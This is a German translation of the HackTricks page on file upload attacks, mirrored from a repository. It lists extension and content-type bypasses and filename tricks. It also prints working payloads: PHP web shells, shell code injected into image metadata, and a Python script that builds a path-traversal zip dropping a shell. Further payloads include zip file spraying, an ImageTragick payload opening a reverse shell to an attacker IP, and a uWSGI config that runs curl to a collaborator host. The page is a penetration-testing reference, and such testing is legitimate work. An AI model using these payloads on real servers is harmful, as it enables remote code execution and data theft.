mirror of https://github.com/carlospolop/hacktricks synced 2024-11-14 17:07:34 +00:00

History

Translator 94c83a5627 Translated ['binary-exploitation/format-strings/README.md', 'binary-expl		2024-11-12 12:23:43 +00:00
..
pdf-upload-xxe-and-cors-bypass.md	Translated ['crypto-and-stego/cryptographic-algorithms/unpacking-binarie	2024-07-19 04:51:58 +00:00
README.md	Translated ['binary-exploitation/format-strings/README.md', 'binary-expl	2024-11-12 12:23:43 +00:00

README.md

Datei-Upload

{% hint style="success" %} Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstütze HackTricks

Überprüfe die Abonnementpläne!
Tritt der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folge uns auf Twitter 🐦 @hacktricks_live.
Teile Hacking-Tricks, indem du PRs zu den HackTricks und HackTricks Cloud GitHub-Repos einreichst.

{% endhint %}

Wenn du an einer Hacking-Karriere interessiert bist und das Unhackbare hacken möchtest - wir stellen ein! (fließend Polnisch in Wort und Schrift erforderlich).

{% embed url="https://www.stmcyber.com/careers" %}

Allgemeine Methodik für Datei-Uploads

Andere nützliche Erweiterungen:

PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
Funktioniert in PHPv8: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws

Umgehung von Überprüfungen der Dateierweiterungen

Wenn sie zutreffen, überprüfe die vorherigen Erweiterungen. Teste sie auch mit einigen Großbuchstaben: pHp, .pHP5, .PhAr ...
Überprüfe das Hinzufügen einer gültigen Erweiterung vor der Ausführungs-Erweiterung (verwende auch vorherige Erweiterungen):

file.png.php
file.png.Php5

Versuche, Sonderzeichen am Ende hinzuzufügen. Du könntest Burp verwenden, um alle ASCII- und Unicode-Zeichen zu bruteforcen. (Beachte, dass du auch die vorher genannten Erweiterungen verwenden kannst)

file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....

Versuche, die Schutzmaßnahmen zu umgehen, indem du den Erweiterungsparser auf der Serverseite mit Techniken wie Verdopplung der Erweiterung oder Hinzufügen von Junk-Daten (Null-Bytes) zwischen den Erweiterungen täuschst. Du kannst auch die vorherigen Erweiterungen verwenden, um eine bessere Payload vorzubereiten.

file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png

Füge eine weitere Schicht von Erweiterungen zur vorherigen Überprüfung hinzu:

file.png.jpg.php
file.php%00.png%00.jpg

Versuche, die exec-Erweiterung vor der gültigen Erweiterung zu setzen und bete, dass der Server falsch konfiguriert ist. (nützlich, um Apache-Misconfigurationen auszunutzen, bei denen alles mit der Erweiterung .php ausgeführt wird, aber nicht unbedingt mit .php enden muss):

z.B.: file.php.png

Verwende NTFS Alternate Data Stream (ADS) in Windows. In diesem Fall wird ein Doppelpunktzeichen “:” nach einer verbotenen Erweiterung und vor einer erlaubten eingefügt. Dadurch wird eine leere Datei mit der verbotenen Erweiterung auf dem Server erstellt (z.B. “file.asax:.jpg”). Diese Datei könnte später mit anderen Techniken bearbeitet werden, z.B. mit ihrem kurzen Dateinamen. Das Muster “::$data” kann auch verwendet werden, um nicht-leere Dateien zu erstellen. Daher könnte das Hinzufügen eines Punktzeichens nach diesem Muster auch nützlich sein, um weitere Einschränkungen zu umgehen (z.B. “file.asp::$data.”)
Versuche, die Dateinamensgrenzen zu brechen. Die gültige Erweiterung wird abgeschnitten. Und die bösartige PHP bleibt. AAA<--SNIP-->AAA.php

# Linux maximal 255 Bytes
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 hier und .png hinzufügen
# Lade die Datei hoch und überprüfe die Antwort, wie viele Zeichen sie zulässt. Sagen wir 236
python -c 'print "A" * 232'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Erstelle die Payload
AAA<--SNIP 232 A-->AAA.php.png

Umgehung von Content-Type, Magic Number, Kompression & Größenänderung

Umgehung der Content-Type-Überprüfungen, indem der Wert des Content-Type Headers auf: image/png, text/plain, application/octet-stream gesetzt wird.

Content-Type Wortliste: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt

Umgehung der Magic Number-Überprüfung, indem am Anfang der Datei die Bytes eines echten Bildes hinzugefügt werden (verwirre den file Befehl). Oder führe die Shell in die Metadaten ein:
exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
\ oder du könntest auch die Payload direkt in ein Bild einfügen:
echo '<?php system($_REQUEST['cmd']); ?>' >> img.png
Wenn Kompression zu deinem Bild hinzugefügt wird, zum Beispiel mit einigen Standard-PHP-Bibliotheken wie PHP-GD, werden die vorherigen Techniken nicht nützlich sein. Du könntest jedoch die PLTE-Chunks Technik hier definiert verwenden, um etwas Text einzufügen, der Kompression übersteht.
Github mit dem Code
Die Webseite könnte auch das Bild verkleinern, indem sie beispielsweise die PHP-GD-Funktionen imagecopyresized oder imagecopyresampled verwendet. Du könntest jedoch die IDAT-Chunks Technik hier definiert verwenden, um etwas Text einzufügen, der Kompression übersteht.
Github mit dem Code
Eine weitere Technik, um eine Payload zu erstellen, die eine Größenänderung eines Bildes übersteht, verwendet die PHP-GD-Funktion thumbnailImage. Du könntest jedoch die tEXt-Chunks Technik hier definiert verwenden, um etwas Text einzufügen, der Kompression übersteht.
Github mit dem Code

Weitere Tricks zur Überprüfung

Finde eine Schwachstelle, um die bereits hochgeladene Datei umzubenennen (um die Erweiterung zu ändern).
Finde eine Local File Inclusion-Schwachstelle, um die Hintertür auszuführen.
Mögliche Informationsoffenlegung:

Lade die gleiche Datei mehrmals (und zur gleichen Zeit) mit dem gleichen Namen hoch.
Lade eine Datei mit dem Namen einer Datei oder Ordners, der bereits existiert.
Lade eine Datei mit “.”, “..” oder “…” als Namen hoch. Zum Beispiel, in Apache in Windows, wenn die Anwendung die hochgeladenen Dateien im Verzeichnis “/www/uploads/” speichert, wird der Dateiname “.” eine Datei namens “uploads” im Verzeichnis “/www/” erstellen.
Lade eine Datei hoch, die möglicherweise nicht leicht gelöscht werden kann, wie “…:.jpg” in NTFS. (Windows)
Lade eine Datei in Windows mit ungültigen Zeichen wie |<>*?” in ihrem Namen hoch. (Windows)
Lade eine Datei in Windows mit reservierten (verbotenen) Namen wie CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8 und LPT9 hoch.

Versuche auch, eine ausführbare Datei (.exe) oder eine .html (weniger verdächtig) hochzuladen, die Code ausführt, wenn sie versehentlich vom Opfer geöffnet wird.

Besondere Erweiterungstricks

Wenn du versuchst, Dateien auf einen PHP-Server hochzuladen, schau dir den .htaccess-Trick an, um Code auszuführen.
Wenn du versuchst, Dateien auf einen ASP-Server hochzuladen, schau dir den .config-Trick an, um Code auszuführen.

Die .phar-Dateien sind wie die .jar für Java, aber für PHP, und können wie eine PHP-Datei verwendet werden (indem sie mit PHP ausgeführt oder in ein Skript eingebunden werden...)

Die .inc-Erweiterung wird manchmal für PHP-Dateien verwendet, die nur zum Importieren von Dateien verwendet werden, sodass jemand zu einem bestimmten Zeitpunkt diese Erweiterung zur Ausführung zugelassen haben könnte.

Jetty RCE

Wenn du eine XML-Datei auf einen Jetty-Server hochladen kannst, kannst du RCE erhalten, weil neue *.xml und *.war automatisch verarbeitet werden. Wie im folgenden Bild erwähnt, lade die XML-Datei in $JETTY_BASE/webapps/ hoch und erwarte die Shell!

uWSGI RCE

Für eine detaillierte Untersuchung dieser Schwachstelle siehe die ursprüngliche Forschung: uWSGI RCE Exploitation.

Remote Command Execution (RCE) Schwachstellen können in uWSGI-Servern ausgenutzt werden, wenn man die Fähigkeit hat, die .ini-Konfigurationsdatei zu ändern. uWSGI-Konfigurationsdateien nutzen eine spezifische Syntax, um "magische" Variablen, Platzhalter und Operatoren einzufügen. Besonders der '@'-Operator, der als @(dateiname) verwendet wird, ist dafür gedacht, den Inhalt einer Datei einzufügen. Unter den verschiedenen unterstützten Schemas in uWSGI ist das "exec"-Schema besonders mächtig, da es das Lesen von Daten aus dem Standardausgang eines Prozesses ermöglicht. Diese Funktion kann für böswillige Zwecke wie Remote Command Execution oder Arbitrary File Write/Read manipuliert werden, wenn eine .ini-Konfigurationsdatei verarbeitet wird.

Betrachte das folgende Beispiel einer schädlichen uwsgi.ini-Datei, die verschiedene Schemas zeigt:

[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)

Die Ausführung des Payloads erfolgt während des Parsens der Konfigurationsdatei. Damit die Konfiguration aktiviert und geparst werden kann, muss der uWSGI-Prozess entweder neu gestartet werden (möglicherweise nach einem Absturz oder aufgrund eines Denial of Service-Angriffs) oder die Datei muss auf automatisches Neuladen eingestellt werden. Die Auto-Reload-Funktion, wenn aktiviert, lädt die Datei in festgelegten Intervallen neu, wenn Änderungen erkannt werden.

Es ist entscheidend, die nachlässige Natur des Parsens der uWSGI-Konfigurationsdatei zu verstehen. Insbesondere kann der besprochene Payload in eine Binärdatei (wie ein Bild oder PDF) eingefügt werden, was den Umfang potenzieller Ausnutzung weiter erweitert.

wget File Upload/SSRF Trick

In einigen Fällen kann es vorkommen, dass ein Server wget verwendet, um Dateien herunterzuladen, und Sie können die URL angeben. In diesen Fällen überprüft der Code möglicherweise, ob die Erweiterung der heruntergeladenen Dateien in einer Whitelist enthalten ist, um sicherzustellen, dass nur erlaubte Dateien heruntergeladen werden. Diese Überprüfung kann jedoch umgangen werden.
Die maximale Länge eines Dateinamens in linux beträgt 255, jedoch kürzt wget die Dateinamen auf 236 Zeichen. Sie können eine Datei mit dem Namen "A"*232+".php"+".gif" herunterladen, dieser Dateiname wird die Überprüfung umgehen (da in diesem Beispiel ".gif" eine gültige Erweiterung ist), aber wget wird die Datei in "A"*232+".php" umbenennen.

#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080

#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s

2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]

Beachten Sie, dass eine andere Option, an die Sie denken könnten, um diese Überprüfung zu umgehen, darin besteht, den HTTP-Server auf eine andere Datei umzuleiten, sodass die ursprüngliche URL die Überprüfung umgeht und wget die umgeleitete Datei mit dem neuen Namen herunterlädt. Dies funktioniert nicht es sei denn, wget wird mit dem Parameter --trust-server-names verwendet, da wget die umgeleitete Seite mit dem Namen der Datei herunterlädt, der in der ursprünglichen URL angegeben ist.

Tools

Upload Bypass ist ein leistungsstarkes Tool, das Pentestern und Bug-Huntern hilft, Datei-Upload-Mechanismen zu testen. Es nutzt verschiedene Bug-Bounty-Techniken, um den Prozess der Identifizierung und Ausnutzung von Schwachstellen zu vereinfachen und gründliche Bewertungen von Webanwendungen sicherzustellen.

Vom Datei-Upload zu anderen Schwachstellen

Setzen Sie filename auf ../../../tmp/lol.png und versuchen Sie, eine Pfad Traversierung zu erreichen.
Setzen Sie filename auf sleep(10)-- -.jpg und Sie könnten in der Lage sein, eine SQL-Injection zu erreichen.
Setzen Sie filename auf <svg onload=alert(document.domain)>, um ein XSS zu erreichen.
Setzen Sie filename auf ; sleep 10;, um einige Befehlsinjektionen zu testen (mehr Befehlsinjektions-Tricks hier).
XSS im Bild (svg) Datei-Upload
JS Datei Upload + XSS = Service Workers Ausnutzung
XXE in svg Upload
Open Redirect durch Hochladen einer svg-Datei
Versuchen Sie verschiedene svg Payloads von https://github.com/allanlw/svg-cheatsheet****
Berühmte ImageTrick Schwachstelle
Wenn Sie den Webserver anweisen können, ein Bild von einer URL abzurufen, könnten Sie versuchen, einen SSRF auszunutzen. Wenn dieses Bild auf einer öffentlichen Seite gespeichert wird, könnten Sie auch eine URL von https://iplogger.org/invisible/ angeben und Informationen von jedem Besucher stehlen.
XXE und CORS Umgehung mit PDF-Adobe Upload
Speziell gestaltete PDFs für XSS: Die folgende Seite zeigt, wie man PDF-Daten injiziert, um JS-Ausführung zu erhalten. Wenn Sie PDFs hochladen können, könnten Sie einige PDFs vorbereiten, die beliebiges JS ausführen, gemäß den gegebenen Anweisungen.
Laden Sie den [eicar](https://secure.eicar.org/eicar.com.txt) Inhalt hoch, um zu überprüfen, ob der Server ein Antivirus hat.
Überprüfen Sie, ob es eine Größenbeschränkung beim Hochladen von Dateien gibt.

Hier ist eine Top-10-Liste von Dingen, die Sie durch Hochladen erreichen können (von hier):

ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
SVG: Stored XSS / SSRF / XXE
GIF: Stored XSS / SSRF
CSV: CSV-Injektion
XML: XXE
AVI: LFI / SSRF
HTML / JS : HTML-Injektion / XSS / Open Redirect
PNG / JPEG: Pixel Flood Attack (DoS)
ZIP: RCE über LFI / DoS
PDF / PPTX: SSRF / BLIND XXE

Burp-Erweiterung

{% embed url="https://github.com/portswigger/upload-scanner" %}

Magische Header-Bytes

PNG: "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["
JPG: "\xff\xd8\xff"

Verweisen Sie auf https://en.wikipedia.org/wiki/List_of_file_signatures für andere Dateitypen.

Zip/Tar-Datei automatisch dekomprimiert hochladen

Wenn Sie eine ZIP-Datei hochladen können, die auf dem Server dekomprimiert wird, können Sie 2 Dinge tun:

Symlink

Laden Sie einen Link hoch, der symbolische Links zu anderen Dateien enthält. Dann, beim Zugriff auf die dekomprimierten Dateien, werden Sie auf die verlinkten Dateien zugreifen:

ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt

Dekomprimieren in verschiedenen Ordnern

Die unerwartete Erstellung von Dateien in Verzeichnissen während der Dekompression ist ein erhebliches Problem. Trotz anfänglicher Annahmen, dass dieses Setup möglicherweise gegen die Ausführung von OS-Befehlen durch bösartige Datei-Uploads schützen könnte, können die hierarchische Unterstützung für Kompression und die Verzeichnisdurchquerungsfähigkeiten des ZIP-Archivformats ausgenutzt werden. Dies ermöglicht Angreifern, Einschränkungen zu umgehen und sichere Upload-Verzeichnisse zu verlassen, indem sie die Dekompressionsfunktionalität der angegriffenen Anwendung manipulieren.

Ein automatisierter Exploit zum Erstellen solcher Dateien ist verfügbar unter evilarc auf GitHub. Das Dienstprogramm kann wie folgt verwendet werden:

# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php

Zusätzlich ist der Symlink-Trick mit evilarc eine Option. Wenn das Ziel darin besteht, eine Datei wie /flag.txt anzuvisieren, sollte ein Symlink zu dieser Datei in Ihrem System erstellt werden. Dies stellt sicher, dass evilarc während seiner Ausführung keine Fehler auftritt.

Unten ist ein Beispiel für Python-Code, der verwendet wird, um eine bösartige Zip-Datei zu erstellen:

#!/usr/bin/python
import zipfile
from io import BytesIO

def create_zip():
f = BytesIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
z.writestr('otherfile.xml', 'Content of the file')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()

create_zip()

Missbrauch von Kompression für File Spraying

Für weitere Details überprüfen Sie den Originalbeitrag in: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/

Erstellen einer PHP-Shell: PHP-Code wird geschrieben, um Befehle auszuführen, die über die $_REQUEST-Variable übergeben werden.

<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>

File Spraying und Erstellung komprimierter Dateien: Mehrere Dateien werden erstellt und ein Zip-Archiv wird zusammengestellt, das diese Dateien enthält.

root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php

Änderung mit einem Hex-Editor oder vi: Die Namen der Dateien im Zip werden mit vi oder einem Hex-Editor geändert, wobei "xxA" in "../" geändert wird, um Verzeichnisse zu durchlaufen.

:set modifiable
:%s/xxA/..\//g
:x!

ImageTragic

Laden Sie diesen Inhalt mit einer Bilddateiendung hoch, um die Schwachstelle auszunutzen (ImageMagick , 7.0.1-1) (aus dem Exploit)

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

Einbetten einer PHP-Shell in PNG

Das Einbetten einer PHP-Shell im IDAT-Chunk einer PNG-Datei kann bestimmte Bildverarbeitungsoperationen effektiv umgehen. Die Funktionen imagecopyresized und imagecopyresampled aus PHP-GD sind in diesem Zusammenhang besonders relevant, da sie häufig zum Verkleinern und Resampeln von Bildern verwendet werden. Die Fähigkeit der eingebetteten PHP-Shell, von diesen Operationen unberührt zu bleiben, ist ein erheblicher Vorteil für bestimmte Anwendungsfälle.

Eine detaillierte Erkundung dieser Technik, einschließlich ihrer Methodik und potenziellen Anwendungen, wird im folgenden Artikel bereitgestellt: "Encoding Web Shells in PNG IDAT chunks". Diese Ressource bietet ein umfassendes Verständnis des Prozesses und seiner Implikationen.

Weitere Informationen unter: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

Polyglot-Dateien

Polyglot-Dateien dienen als einzigartiges Werkzeug in der Cybersicherheit und fungieren als Chamäleons, die gleichzeitig in mehreren Dateiformaten gültig existieren können. Ein faszinierendes Beispiel ist ein GIFAR, ein Hybrid, der sowohl als GIF als auch als RAR-Archiv funktioniert. Solche Dateien sind nicht auf diese Kombination beschränkt; Kombinationen wie GIF und JS oder PPT und JS sind ebenfalls möglich.

Der Hauptnutzen von Polyglot-Dateien liegt in ihrer Fähigkeit, Sicherheitsmaßnahmen zu umgehen, die Dateien basierend auf ihrem Typ überprüfen. Übliche Praktiken in verschiedenen Anwendungen erlauben nur bestimmte Dateitypen zum Hochladen—wie JPEG, GIF oder DOC—um das Risiko potenziell schädlicher Formate (z. B. JS, PHP oder Phar-Dateien) zu mindern. Ein Polyglot kann jedoch, indem es den strukturellen Kriterien mehrerer Dateitypen entspricht, diese Einschränkungen heimlich umgehen.

Trotz ihrer Anpassungsfähigkeit stoßen Polyglots auf Einschränkungen. Zum Beispiel könnte der Erfolg des Hochladens eines Polyglots, das gleichzeitig eine PHAR-Datei (PHp ARchive) und ein JPEG verkörpert, von den Richtlinien der Plattform bezüglich der Dateiendungen abhängen. Wenn das System strenge Vorgaben zu zulässigen Erweiterungen hat, könnte die bloße strukturelle Dualität eines Polyglots nicht ausreichen, um sein Hochladen zu garantieren.

Weitere Informationen unter: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a

Referenzen

Wenn Sie an einer Hacking-Karriere interessiert sind und das Unhackbare hacken möchten - wir stellen ein! (fließend Polnisch in Wort und Schrift erforderlich).